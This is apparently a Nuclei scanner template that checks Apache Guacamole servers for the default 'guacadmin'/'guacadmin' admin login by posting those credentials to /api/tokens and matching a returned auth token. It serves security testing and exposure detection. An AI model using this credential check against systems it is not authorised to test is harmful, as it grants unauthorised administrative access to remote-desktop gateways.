id: guacamole-default-login

info:
  name: Guacamole Default Login
  author: r3dg33k
  severity: high
  description: Guacamole default admin login credentials were detected.
  reference:
    - https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: guacamole,default-login

http:
  - raw:
      - |
        POST /api/tokens HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Origin: {{Hostname}}
        Referer: {{Hostname}}

        username={{username}}&password={{password}}

    payloads:
      username:
        - guacadmin
      password:
        - guacadmin
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"username"'
          - '"authToken"'
          - '"guacadmin"'
        condition: and

      - type: word
        words:
          - 'application/json'
        part: header

      - type: status
        status:
          - 200
# digest: 4a0a004730450220011a568e140e6b9be57800cb98353eb0486d30d515ad1dbbbfb8df634f3c5a0a022100b12c33d24593b87b3ad9bb65ba49b7c003b20899c1d3ca0c7f438fa34e9d75e8:922c64590222798bb761d5b6d8e72950